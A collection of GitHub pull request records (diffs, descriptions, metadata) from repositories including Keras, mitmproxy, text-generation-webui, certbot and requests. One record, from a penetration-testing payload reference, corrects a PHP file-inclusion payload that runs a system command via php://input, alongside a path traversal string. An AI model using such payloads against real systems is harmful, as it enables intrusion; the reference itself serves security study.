self._feed_sample_weight_modes = []
for i in range(len(self.outputs)):
- if i not in skip_indices:
+ if i not in skip_target_weighing_indices:
self._feed_sample_weight_modes.append(self.sample_weight_modes[i])
- # Prepare targets of model.
- self.targets = []
- self._feed_targets = []
- for i in range(len(self.outputs)):
- if i in skip_indices:
- self.targets.append(None)
- else:
- shape = self.internal_output_shapes[i]
- name = self.output_names[i]
- target = K.placeholder(ndim=len(shape),
- name=name + '_target',
- sparse=K.is_sparse(self.outputs[i]),
- dtype=K.dtype(self.outputs[i]))
- self.targets.append(target)
- self._feed_targets.append(target)
-
# Prepare metrics.
self.metrics = metrics
self.weighted_metrics = weighted_metrics
@@ -792,7 +836,7 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
total_loss = None
with K.name_scope('loss'):
for i in range(len(self.outputs)):
- if i in skip_indices:
+ if i in skip_target_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
@@ -836,7 +880,7 @@ def append_metric(layer_index, metric_name, metric_tensor):
with K.name_scope('metrics'):
for i in range(len(self.outputs)):
- if i in skip_indices:
+ if i in skip_target_indices:
continue
y_true = self.targets[i]
@@ -884,7 +928,7 @@ def handle_metrics(metrics, weights=None):
self.sample_weights = sample_weights
self._feed_sample_weights = []
for i in range(len(self.sample_weights)):
- if i not in skip_indices:
+ if i not in skip_target_weighing_indices:
self._feed_sample_weights.append(sample_weights[i])
# Functions for train, test and predict will
diff --git a/tests/keras/engine/test_training.py b/tests/keras/engine/test_training.py
index a17187f5a31..f0986978421 100644
--- a/tests/keras/engine/test_training.py
+++ b/tests/keras/engine/test_training.py
@@ -4,10 +4,10 @@
import sys
import scipy.sparse as sparse
+import keras
from keras.layers import Dense, Dropout
from keras.engine.topology import Input
from keras.engine.training import Model
-from keras.engine.training import Model
from keras.engine.training import _check_loss_and_target_compatibility
from keras.engine.training import _weighted_masked_objective
from keras.engine.training import _check_array_lengths
@@ -673,7 +673,7 @@ def test_model_with_partial_loss():
@keras_test
@pytest.mark.skipif((K.backend() == 'cntk'),
- reason="cntk does not support external loss yet")
+ reason='cntk does not support external loss yet')
def test_model_with_external_loss():
# None loss, only regularization loss.
a = Input(shape=(3,), name='input_a')
@@ -749,5 +749,64 @@ def test_model_with_external_loss():
assert out.shape == (10, 4)
+@keras_test
+def test_target_tensors():
+ # single-output, as list
+ model = keras.models.Sequential()
+ model.add(keras.layers.Dense(4, input_shape=(4,), name='dense'))
+ input_val = np.random.random((10, 4))
+ target_val = np.random.random((10, 4))
+ target = keras.backend.variable(target_val)
+ model.compile(optimizer='rmsprop', loss='mse', target_tensors=[target])
+ model.train_on_batch(input_val, None)
+
+ # single-output, as dict
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors={'dense': target})
+ model.train_on_batch(input_val, None)
+
+ # test invalid arguments
+ with pytest.raises(TypeError):
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=set())
+ with pytest.raises(ValueError):
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=[target, target])
+ with pytest.raises(ValueError):
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors={'dense2': None})
+ with pytest.raises(ValueError):
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=[target])
+ model.train_on_batch(input_val, target_val)
+
+ # multi-output, as list
+ input_val = np.random.random((10, 4))
+ target_val_a = np.random.random((10, 4))
+ target_val_b = np.random.random((10, 4))
+ target_a = keras.backend.variable(target_val_a)
+ target_b = keras.backend.variable(target_val_b)
+
+ inputs = keras.layers.Input(shape=(4,))
+ output_a = keras.layers.Dense(4, name='dense_a')(inputs)
+ output_b = keras.layers.Dense(4, name='dense_b')(inputs)
+ model = keras.models.Model(inputs, [output_a, output_b])
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=[target_a, target_b])
+ model.train_on_batch(input_val, None)
+
+ # multi-output, as dict
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors={'dense_a': target_a,
+ 'dense_b': target_b})
+ model.train_on_batch(input_val, None)
+
+ # test with sample weights
+ model.compile(optimizer='rmsprop', loss='mse',
+ target_tensors=[target_a, target_b])
+ model.train_on_batch(input_val, None,
+ sample_weight={'dense_a': np.random.random((10,))})
+
+
if __name__ == '__main__':
pytest.main([__file__])
| https://api.github.com/repos/keras-team/keras/pulls/7645 | 2017-08-14T23:44:25Z | 2017-08-15T00:52:54Z | 2017-08-15T00:52:54Z | 2017-08-15T00:53:04Z | 2,813 | keras-team/keras | 47,800 |
|
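
Adapted from the tests added in the diff above, a minimal sketch of how the new `target_tensors` compile argument is used (assumes Keras 2.x with a backend that supports feeding targets as tensors):

```python
# Sketch of compile(..., target_tensors=...) based on the tests added in this PR.
import numpy as np
import keras
from keras import backend as K

model = keras.models.Sequential()
model.add(keras.layers.Dense(4, input_shape=(4,), name='dense'))

input_val = np.random.random((10, 4))
target_val = np.random.random((10, 4))
target = K.variable(target_val)

# The target is a tensor owned by Keras, so no Numpy targets are passed at train time.
model.compile(optimizer='rmsprop', loss='mse', target_tensors=[target])
model.train_on_batch(input_val, None)
```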
Update README.md | diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index e0cccdf9e6..2d1c2d95b0 100644
--- a/File Inclusion - Path Traversal/README.md
+++ b/File Inclusion - Path Traversal/README.md
@@ -186,7 +186,7 @@ Specify your payload in the POST parameters
```powershell
http://example.com/index.php?page=php://input
-POST DATA: <? system('id'); ?>
+POST DATA: <?php system('id'); ?>
```
### Wrapper phar://
@@ -340,4 +340,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
-* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
\ No newline at end of file
+* [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
| https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/30 | 2018-11-19T11:45:38Z | 2018-11-19T13:01:45Z | 2018-11-19T13:01:45Z | 2018-11-19T13:01:45Z | 385 | swisskyrepo/PayloadsAllTheThings | 8,442 |
|
Respect response to CONNECT created in http_connect function in upstream mode | diff --git a/mitmproxy/proxy/protocol/http.py b/mitmproxy/proxy/protocol/http.py
index 502280c140..a366861d7a 100644
--- a/mitmproxy/proxy/protocol/http.py
+++ b/mitmproxy/proxy/protocol/http.py
@@ -217,16 +217,19 @@ def handle_regular_connect(self, f):
return False
def handle_upstream_connect(self, f):
- self.establish_server_connection(
- f.request.host,
- f.request.port,
- f.request.scheme
- )
- self.send_request(f.request)
- f.response = self.read_response_headers()
- f.response.data.content = b"".join(
- self.read_response_body(f.request, f.response)
- )
+ # if the user specifies a response in the http_connect hook, we do not connect upstream here.
+ # https://github.com/mitmproxy/mitmproxy/pull/2473
+ if not f.response:
+ self.establish_server_connection(
+ f.request.host,
+ f.request.port,
+ f.request.scheme
+ )
+ self.send_request(f.request)
+ f.response = self.read_response_headers()
+ f.response.data.content = b"".join(
+ self.read_response_body(f.request, f.response)
+ )
self.send_response(f.response)
if is_ok(f.response.status_code):
layer = UpstreamConnectLayer(self, f.request)
 | Example script that creates a response to CONNECT:
```
from mitmproxy.http import make_connect_response
def http_connect(flow):
if flow.request.method == 'CONNECT':
# You may also selectively deny CONNECT request from certain IPs here.
flow.response = make_connect_response(flow.request.http_version)
```
Fixes #2464 | https://api.github.com/repos/mitmproxy/mitmproxy/pulls/2473 | 2017-07-26T10:20:36Z | 2017-07-26T10:57:21Z | 2017-07-26T10:57:21Z | 2017-07-27T02:02:22Z | 320 | mitmproxy/mitmproxy | 28,334 |
Instruct style improvements | diff --git a/README.md b/README.md
index d35ebe04aa..4b65254d83 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ Its goal is to become the [AUTOMATIC1111/stable-diffusion-webui](https://github.
* Dropdown menu for quickly switching between different models.
* Large number of extensions (built-in and user-contributed), including Coqui TTS for realistic voice outputs, Whisper STT for voice inputs, translation, [multimodal pipelines](https://github.com/oobabooga/text-generation-webui/tree/main/extensions/multimodal), vector databases, Stable Diffusion integration, and a lot more. See [the wiki](https://github.com/oobabooga/text-generation-webui/wiki/07-%E2%80%90-Extensions) and [the extensions directory](https://github.com/oobabooga/text-generation-webui-extensions) for details.
* [Chat with custom characters](https://github.com/oobabooga/text-generation-webui/wiki/03-%E2%80%90-Parameters-Tab#character).
-* Precise chat templates for instruction-following models, including Llama-2-chat, Alpaca, Vicuna, Mistral, and many others.
+* Precise chat templates for instruction-following models, including Llama-2-chat, Alpaca, Vicuna, Mistral.
* LoRA: train new LoRAs with your own data, load/unload LoRAs on the fly for generation.
* Transformers library integration: load models in 4-bit or 8-bit precision through bitsandbytes, use llama.cpp with transformers samplers (`llamacpp_HF` loader), CPU inference in 32-bit precision using PyTorch.
* OpenAI-compatible API server with Chat and Completions endpoints -- see the [examples](https://github.com/oobabooga/text-generation-webui/wiki/12-%E2%80%90-OpenAI-API#examples).
diff --git a/css/html_instruct_style.css b/css/html_instruct_style.css
index 1908f879f7..acff04f196 100644
--- a/css/html_instruct_style.css
+++ b/css/html_instruct_style.css
@@ -1,10 +1,18 @@
+.chat {
+ background: var(--block-background-fill);
+ padding: 24px 19px;
+ padding-right: 19px !important;
+ border: 1px solid var(--block-border-color);
+ border-radius: 8px;
+}
+
.message {
display: grid;
grid-template-columns: 60px 1fr;
padding-bottom: 25px;
font-size: 15px;
font-family: 'Noto Sans', Helvetica, Arial, sans-serif;
- line-height: 22px;
+ line-height: 24px;
}
.username {
@@ -13,11 +21,16 @@
.message-body p, .message-body li {
font-size: 15px !important;
- line-height: 22.5px !important;
+ line-height: 24px !important;
+ list-style-position: outside;
}
.message-body p, .chat .message-body ul, .chat .message-body ol {
- margin-bottom: 23.4375px !important;
+ margin-bottom: 16px !important;
+}
+
+.chat .message-body ul, .chat .message-body ol {
+ padding-inline-start: 2em;
}
.message-body p:last-child, .chat .message-body ul:last-child, .chat .message-body ol:last-child {
@@ -34,34 +47,34 @@
.gradio-container .chat .assistant-message {
padding: 20px;
- border-radius: 20px;
- background-color: #0000000f;
- margin-top: 9px !important;
- margin-bottom: 18px !important;
+ background: var(--background-fill-secondary);
+ margin-top: 12px !important;
+ margin-bottom: 24px !important;
+ margin-right: 16px;
+ border-radius: 22px;
+ border-bottom-left-radius: 0;
+ border: 1px solid var(--border-color-primary);
}
.gradio-container .chat .user-message {
padding: 20px;
+ background-color: var(--color-accent-soft);
border-radius: 20px;
- margin-bottom: 9px !important;
+ margin-bottom: 12px !important;
+ margin-left: 16px;
+ border-radius: 22px;
+ border-bottom-right-radius: 0;
+ border: 1px solid var(--border-color-accent-subdued);
}
.gradio-container .chat .assistant-message:last-child, .gradio-container .chat .user-message:last-child {
margin-bottom: 0 !important;
}
-.dark .chat .assistant-message {
- background-color: #1f2937;
-}
-
-.dark .chat .user-message {
- background-color: transparent;
-}
-
code {
- background-color: white !important;
+ background-color: #f3f4f6 !important;
}
.dark code {
- background-color: #0e1321 !important;
+ background-color: #1f2937 !important;
}
\ No newline at end of file
diff --git a/css/main.css b/css/main.css
index a3480fe034..a53f99d025 100644
--- a/css/main.css
+++ b/css/main.css
@@ -332,7 +332,7 @@ div.svelte-362y77>*, div.svelte-362y77>.form>* {
margin-left: auto;
margin-right: auto;
max-width: 880px;
- height: 100%;
+ min-height: var(--chat-height);
overflow-y: auto;
padding-right: 15px;
display: flex;
diff --git a/js/main.js b/js/main.js
index 1e50e14742..5c05b394c8 100644
--- a/js/main.js
+++ b/js/main.js
@@ -123,6 +123,8 @@ targetElement.addEventListener("scroll", function() {
// Create a MutationObserver instance
const observer = new MutationObserver(function(mutations) {
mutations.forEach(function(mutation) {
+ updateChatHeight();
+
if(!isScrolled) {
targetElement.scrollTop = targetElement.scrollHeight;
}
@@ -373,3 +375,15 @@ function toggleBigPicture() {
}
}
+//------------------------------------------------
+// Define the --chat-height global CSS variable to
+// the height of the chat parent
+//------------------------------------------------
+function updateChatHeight() {
+ const chatContainer = document.getElementById('chat').parentNode.parentNode.parentNode;
+ const newChatHeight = `${chatContainer.clientHeight}px`;
+
+ document.documentElement.style.setProperty('--chat-height', newChatHeight);
+}
+
+window.addEventListener('resize', updateChatHeight);
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/4951 | 2023-12-16T21:57:16Z | 2023-12-17T01:16:27Z | 2023-12-17T01:16:27Z | 2023-12-17T03:40:22Z | 1,540 | oobabooga/text-generation-webui | 26,456 |
|
asyncio: fix exit behaviour for console | diff --git a/mitmproxy/master.py b/mitmproxy/master.py
index 19a2ac6724..bbbd07d0e7 100644
--- a/mitmproxy/master.py
+++ b/mitmproxy/master.py
@@ -1,3 +1,5 @@
+import sys
+import traceback
import threading
import asyncio
import logging
@@ -85,18 +87,40 @@ async def tick(self):
self.addons.trigger("tick")
await asyncio.sleep(0.1)
- def run(self):
+ def run_loop(self, loop):
self.start()
asyncio.ensure_future(self.tick())
- loop = asyncio.get_event_loop()
+
+ exc = None
try:
- loop.run_forever()
+ loop()
+ except Exception as e:
+ exc = traceback.format_exc()
finally:
+ if not self.should_exit.is_set():
+ self.shutdown()
pending = asyncio.Task.all_tasks()
- loop.run_until_complete(asyncio.gather(*pending))
+ loop = asyncio.get_event_loop()
+ try:
+ loop.run_until_complete(asyncio.gather(*pending))
+ except Exception as e:
+ # When we exit with an error, shutdown might not happen cleanly,
+ # and we can get exceptions here caused by pending Futures.
+ pass
loop.close()
+
+ if exc: # pragma: no cover
+ print(exc, file=sys.stderr)
+ print("mitmproxy has crashed!", file=sys.stderr)
+ print("Please lodge a bug report at:", file=sys.stderr)
+ print("\thttps://github.com/mitmproxy/mitmproxy", file=sys.stderr)
+
self.addons.trigger("done")
+ def run(self, func=None):
+ loop = asyncio.get_event_loop()
+ self.run_loop(loop.run_forever)
+
async def _shutdown(self):
if self.server:
self.server.shutdown()
diff --git a/mitmproxy/tools/console/master.py b/mitmproxy/tools/console/master.py
index c66129b21e..9ed73ce93b 100644
--- a/mitmproxy/tools/console/master.py
+++ b/mitmproxy/tools/console/master.py
@@ -9,7 +9,6 @@
import subprocess
import sys
import tempfile
-import traceback
import typing # noqa
import contextlib
@@ -205,7 +204,6 @@ def run(self):
screen = self.ui,
handle_mouse = self.options.console_mouse,
)
-
self.window = window.Window(self)
self.loop.widget = self.window
self.window.refresh()
@@ -216,24 +214,7 @@ def display_err(*_):
self.start_err = None
self.loop.set_alarm_in(0.01, display_err)
- self.start()
- try:
- self.loop.run()
- except Exception:
- self.loop.stop()
- sys.stdout.flush()
- print(traceback.format_exc(), file=sys.stderr)
- print("mitmproxy has crashed!", file=sys.stderr)
- print("Please lodge a bug report at:", file=sys.stderr)
- print("\thttps://github.com/mitmproxy/mitmproxy", file=sys.stderr)
- print("Shutting down...", file=sys.stderr)
- finally:
- sys.stderr.flush()
- super().shutdown()
- self.addons.trigger("done")
-
- def shutdown(self):
- raise urwid.ExitMainLoop
+ super().run_loop(self.loop.run)
def overlay(self, widget, **kwargs):
self.window.set_overlay(widget, **kwargs)
| - Add a master.run_loop function. This encapsulates our run behaviour so that
it can be used by implementations that need to manage their own run loop (like urwid).
- Shift crash exit message to the common core. I'm not convinced we really need
this, but if we want it, it should be centralised.
- Clean up an extra exception that can be thrown by asyncio itself on "dirty"
termination after a mitmproxy crash. | https://api.github.com/repos/mitmproxy/mitmproxy/pulls/3064 | 2018-04-16T22:23:38Z | 2018-04-17T19:58:52Z | 2018-04-17T19:58:52Z | 2018-05-15T21:48:47Z | 781 | mitmproxy/mitmproxy | 28,237 |
Added minimum waiting time problem solution using greedy algorithm | diff --git a/DIRECTORY.md b/DIRECTORY.md
index 681d252b232d..297fb9f5defa 100644
--- a/DIRECTORY.md
+++ b/DIRECTORY.md
@@ -449,6 +449,7 @@
* [Fractional Knapsack](greedy_methods/fractional_knapsack.py)
* [Fractional Knapsack 2](greedy_methods/fractional_knapsack_2.py)
* [Optimal Merge Pattern](greedy_methods/optimal_merge_pattern.py)
+ * [Minimum Waiting Time ](greedy_methods/minimum_waiting_time.py)
## Hashes
* [Adler32](hashes/adler32.py)
diff --git a/greedy_methods/minimum_waiting_time.py b/greedy_methods/minimum_waiting_time.py
new file mode 100644
index 000000000000..aaae8cf8f720
--- /dev/null
+++ b/greedy_methods/minimum_waiting_time.py
@@ -0,0 +1,48 @@
+"""
+Calculate the minimum waiting time using a greedy algorithm.
+reference: https://www.youtube.com/watch?v=Sf3eiO12eJs
+
+For doctests run following command:
+python -m doctest -v minimum_waiting_time.py
+
+The minimum_waiting_time function uses a greedy algorithm to calculate the minimum
+time for queries to complete. It sorts the list in non-decreasing order, calculates
+the waiting time for each query by multiplying its position in the list with the
+sum of all remaining query times, and returns the total waiting time. A doctest
+ensures that the function produces the correct output.
+"""
+
+
+def minimum_waiting_time(queries: list[int]) -> int:
+ """
+ This function takes a list of query times and returns the minimum waiting time
+ for all queries to be completed.
+
+ Args:
+ queries: A list of queries measured in picoseconds
+
+ Returns:
+ total_waiting_time: Minimum waiting time measured in picoseconds
+
+ Examples:
+ >>> minimum_waiting_time([3, 2, 1, 2, 6])
+ 17
+ >>> minimum_waiting_time([3, 2, 1])
+ 4
+ >>> minimum_waiting_time([1, 2, 3, 4])
+ 10
+ >>> minimum_waiting_time([5, 5, 5, 5])
+ 30
+ >>> minimum_waiting_time([])
+ 0
+ """
+ n = len(queries)
+ if n in (0, 1):
+ return 0
+ return sum(query * (n - i - 1) for i, query in enumerate(sorted(queries)))
+
+
+if __name__ == "__main__":
+ import doctest
+
+ doctest.testmod()
| ### Describe your change:
* [x] Add an algorithm?
* [ ] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?
### Checklist:
* [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [x] This pull request is all my own work -- I have not plagiarized.
* [x] I know that pull requests will not be merged if they fail the automated tests.
* [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [x] All new Python files are placed inside an existing directory.
* [x] All filenames are in all lowercase characters with no spaces or dashes.
* [x] All functions and variable names follow Python naming conventions.
* [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [x] All new algorithms include at least one URL that points to Wikipedia or another similar explanation.
* [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
| https://api.github.com/repos/TheAlgorithms/Python/pulls/8701 | 2023-04-29T17:27:34Z | 2023-05-01T10:23:04Z | 2023-05-01T10:23:03Z | 2023-05-01T10:23:04Z | 639 | TheAlgorithms/Python | 30,043 |
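
A quick worked check of the greedy formula in the diff (sort ascending, then weight each query by the number of queries still waiting behind it); this is a sketch, not part of the PR:

```python
# Worked example of the greedy waiting-time formula used in the diff.
queries = [3, 2, 1, 2, 6]
ordered = sorted(queries)  # [1, 2, 2, 3, 6]
n = len(ordered)

# Each query contributes its duration once for every query scheduled after it.
total = sum(q * (n - i - 1) for i, q in enumerate(ordered))
print(total)  # 17, matching the doctest above
```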
Correct "bug," typo to "bug", in README.md | diff --git a/README.md b/README.md
index 5de6bb99a..4d9b06bb9 100755
--- a/README.md
+++ b/README.md
@@ -104,7 +104,7 @@ In order to help developers address these risks, we have created the [Responsibl
## Issues
-Please report any software “bug,” or other problems with the models through one of the following means:
+Please report any software “bug”, or other problems with the models through one of the following means:
- Reporting issues with the model: [github.com/facebookresearch/llama](http://github.com/facebookresearch/llama)
- Reporting risky content generated by the model: [developers.facebook.com/llama_output_feedback](http://developers.facebook.com/llama_output_feedback)
- Reporting bugs and security concerns: [facebook.com/whitehat/info](http://facebook.com/whitehat/info)
| https://api.github.com/repos/meta-llama/llama/pulls/897 | 2023-11-02T17:47:25Z | 2023-11-02T17:53:24Z | 2023-11-02T17:53:24Z | 2023-11-02T17:53:24Z | 198 | meta-llama/llama | 31,949 |
|
#428: Don't fail when history is readonly | diff --git a/thefuck/shells.py b/thefuck/shells.py
index 170c2ae10..f78d25755 100644
--- a/thefuck/shells.py
+++ b/thefuck/shells.py
@@ -10,13 +10,14 @@
import io
import os
import shlex
+import sys
import six
from .utils import DEVNULL, memoize, cache
from .conf import settings
+from . import logs
class Generic(object):
-
def get_aliases(self):
return {}
@@ -69,8 +70,8 @@ def get_history(self):
lines = lines[-settings.history_limit:]
for line in lines:
- prepared = self._script_from_history(line)\
- .strip()
+ prepared = self._script_from_history(line) \
+ .strip()
if prepared:
yield prepared
@@ -117,9 +118,9 @@ def _parse_alias(self, alias):
def get_aliases(self):
proc = Popen(['bash', '-ic', 'alias'], stdout=PIPE, stderr=DEVNULL)
return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '=' in alias)
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '=' in alias)
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -139,7 +140,6 @@ def how_to_configure(self):
class Fish(Generic):
-
def _get_overridden_aliases(self):
overridden_aliases = os.environ.get('TF_OVERRIDDEN_ALIASES', '').strip()
if overridden_aliases:
@@ -219,9 +219,9 @@ def _parse_alias(self, alias):
def get_aliases(self):
proc = Popen(['zsh', '-ic', 'alias'], stdout=PIPE, stderr=DEVNULL)
return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '=' in alias)
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '=' in alias)
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -254,9 +254,9 @@ def _parse_alias(self, alias):
def get_aliases(self):
proc = Popen(['tcsh', '-ic', 'alias'], stdout=PIPE, stderr=DEVNULL)
return dict(
- self._parse_alias(alias)
- for alias in proc.stdout.read().decode('utf-8').split('\n')
- if alias and '\t' in alias)
+ self._parse_alias(alias)
+ for alias in proc.stdout.read().decode('utf-8').split('\n')
+ if alias and '\t' in alias)
def _get_history_file_name(self):
return os.environ.get("HISTFILE",
@@ -303,7 +303,10 @@ def thefuck_alias():
def put_to_history(command):
- return _get_shell().put_to_history(command)
+ try:
+ return _get_shell().put_to_history(command)
+ except IOError:
+ logs.exception("Can't update history", sys.exc_info())
def and_(*commands):
| https://api.github.com/repos/nvbn/thefuck/pulls/431 | 2016-01-13T19:01:22Z | 2016-01-13T19:03:31Z | 2016-01-13T19:03:31Z | 2016-01-13T19:12:53Z | 761 | nvbn/thefuck | 30,810 |
|
Fix github source links in docs | diff --git a/.github/workflows/build_documentation.yml b/.github/workflows/build_documentation.yml
index b7d1f895cd..167b7d610b 100644
--- a/.github/workflows/build_documentation.yml
+++ b/.github/workflows/build_documentation.yml
@@ -16,5 +16,6 @@ jobs:
package_name: timm
repo_owner: rwightman
path_to_docs: pytorch-image-models/hfdocs/source
+ version_tag_suffix: ""
secrets:
token: ${{ secrets.HUGGINGFACE_PUSH }}
\ No newline at end of file
 | Adds `version_tag_suffix` to the main doc workflow (it's already in the PR doc build workflow). Without it, GitHub source links have a `src/` part in them that breaks them.
| https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1612 | 2023-01-04T17:35:57Z | 2023-01-04T17:42:05Z | 2023-01-04T17:42:05Z | 2023-01-04T17:44:50Z | 136 | huggingface/pytorch-image-models | 16,469 |
Add 3rd party certbot-dns-godaddy to the docs | diff --git a/certbot/docs/using.rst b/certbot/docs/using.rst
index cc061b62232..be4d96c4f79 100644
--- a/certbot/docs/using.rst
+++ b/certbot/docs/using.rst
@@ -285,6 +285,7 @@ dns-clouddns_ Y N DNS Authentication using CloudDNS API
dns-lightsail_ Y N DNS Authentication using Amazon Lightsail DNS API
dns-inwx_ Y Y DNS Authentication for INWX through the XML API
dns-azure_ Y N DNS Authentication using Azure DNS
+dns-godaddy_ Y N DNS Authentication using Godaddy DNS
================== ==== ==== ===============================================================
.. _haproxy: https://github.com/greenhost/certbot-haproxy
@@ -300,6 +301,7 @@ dns-azure_ Y N DNS Authentication using Azure DNS
.. _dns-lightsail: https://github.com/noi/certbot-dns-lightsail
.. _dns-inwx: https://github.com/oGGy990/certbot-dns-inwx/
.. _dns-azure: https://github.com/binkhq/certbot-dns-azure
+.. _dns-godaddy: https://github.com/miigotu/certbot-dns-godaddy
If you're interested, you can also :ref:`write your own plugin <dev-plugin>`.
| ## Pull Request Checklist
| https://api.github.com/repos/certbot/certbot/pulls/8844 | 2021-05-12T04:29:46Z | 2021-05-12T23:22:32Z | 2021-05-12T23:22:32Z | 2021-05-13T04:43:03Z | 326 | certbot/certbot | 1,774 |
Fix various bugs for LoRA training | diff --git a/modules/training.py b/modules/training.py
index b0e0240085..2830ba07ff 100644
--- a/modules/training.py
+++ b/modules/training.py
@@ -341,7 +341,7 @@ def do_train(lora_name: str, always_override: bool, q_proj_en: bool, v_proj_en:
# Populate target_modules list with chosen X_proj modules. Llama-based models only atm, non-llama will revert to default behavior.
def list_target_modules(model_id):
- if model_id != "llama":
+ if model_id != "llama" and model_id != "mistral":
return model_to_lora_modules[model_id]
available_modules = {
@@ -517,7 +517,8 @@ def generate_and_tokenize_prompt(data_point):
# == Start prepping the model itself ==
if not hasattr(shared.model, 'lm_head') or hasattr(shared.model.lm_head, 'weight'):
logger.info("Getting model ready")
- prepare_model_for_kbit_training(shared.model)
+ if 'quantization_config' in shared.model.config.to_dict():
+ prepare_model_for_kbit_training(shared.model)
# base model is now frozen and should not be reused for any other LoRA training than this one
shared.model_dirty_from_training = True
@@ -615,7 +616,8 @@ def on_log(self, args: transformers.TrainingArguments, state: transformers.Train
warmup_steps=math.ceil(warmup_steps / gradient_accumulation_steps),
num_train_epochs=epochs,
learning_rate=actual_lr,
- fp16=False if shared.args.cpu else True,
+ fp16=False if shared.args.cpu or shared.args.bf16 else True,
+ bf16=shared.args.bf16,
optim=optimizer,
logging_steps=2 if stop_at_loss > 0 else 5,
evaluation_strategy="steps" if eval_data is not None else "no",
@@ -627,7 +629,7 @@ def on_log(self, args: transformers.TrainingArguments, state: transformers.Train
# TODO: Enable multi-device support
ddp_find_unused_parameters=None,
no_cuda=shared.args.cpu,
- use_ipex=True if is_torch_xpu_available and not shared.args.cpu else False
+ use_ipex=True if is_torch_xpu_available() and not shared.args.cpu else False
),
data_collator=transformers.DataCollatorForLanguageModeling(shared.tokenizer, mlm=False),
callbacks=list([Callbacks()])
| - Allow mistral models to have all modules targeted selectively, since the module names are the same as those for llama models
- Fixed issue that occurred because prepare_model_for_kbit_training was being run on unquantized models that didn't need it (causing an OOM error)
- Fixed issue in the training arguments that didn't allow BF16 training to take place even when the appropriate options were selected in the model menu (see the sketch after this list)
- Fixed typo that erroneously (always) enabled IPEX
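
A minimal, hypothetical sketch of the precision-flag logic behind the BF16 fix above (illustrative only — `precision_flags` is an invented helper mirroring the `fp16=...`/`bf16=...` lines in the diff, not code from this PR):

```python
# Minimal sketch: fp16 only when neither CPU-only mode nor bf16 is requested;
# bf16 passes straight through, mirroring the patched TrainingArguments lines.
def precision_flags(cpu: bool, bf16: bool) -> dict:
    return {"fp16": not (cpu or bf16), "bf16": bf16}


assert precision_flags(cpu=False, bf16=False) == {"fp16": True, "bf16": False}
assert precision_flags(cpu=False, bf16=True) == {"fp16": False, "bf16": True}
assert precision_flags(cpu=True, bf16=False) == {"fp16": False, "bf16": False}
```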
## Checklist:
- [x] I have read the [Contributing guidelines](https://github.com/oobabooga/text-generation-webui/wiki/Contributing-guidelines).
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/5161 | 2024-01-03T22:10:15Z | 2024-01-03T23:42:21Z | 2024-01-03T23:42:21Z | 2024-01-04T06:43:41Z | 552 | oobabooga/text-generation-webui | 26,414 |
Improve test structure (proposal) | diff --git a/test_requests.py b/tests/integration/test_requests.py
similarity index 100%
rename from test_requests.py
rename to tests/integration/test_requests.py
diff --git a/tests/unit/test_requests_api.py b/tests/unit/test_requests_api.py
new file mode 100755
index 0000000000..98591c3b64
--- /dev/null
+++ b/tests/unit/test_requests_api.py
@@ -0,0 +1,71 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+import unittest
+import mock
+import sys
+import os
+sys.path.append(os.getcwd())
+
+try:
+ import omnijson as json
+except ImportError:
+ import json
+
+import requests
+from requests.models import Response
+
+class RequestsAPIUnitTests(unittest.TestCase):
+ """Requests API unit test cases."""
+
+ def setUp(self):
+ pass
+
+
+ def tearDown(self):
+ """Teardown."""
+ pass
+
+
+ @mock.patch('requests.api.request')
+ def test_http_get(self, mock_request):
+ mock_request.return_value = Response()
+ requests.get('http://google.com')
+ mock_request.assert_called_once_with('get', 'http://google.com',
+ allow_redirects= True)
+
+ @mock.patch('requests.api.request')
+ def test_http_head(self, mock_request):
+ mock_request.return_value = Response()
+ requests.head('http://google.com')
+ mock_request.assert_called_once_with('head', 'http://google.com',
+ allow_redirects= True)
+
+ @mock.patch('requests.api.request')
+ def test_http_post(self, mock_request):
+ mock_request.return_value = Response()
+ requests.post('http://google.com', {})
+ mock_request.assert_called_once_with('post', 'http://google.com',
+ data= {})
+
+ @mock.patch('requests.api.request')
+ def test_http_put(self, mock_request):
+ mock_request.return_value = Response()
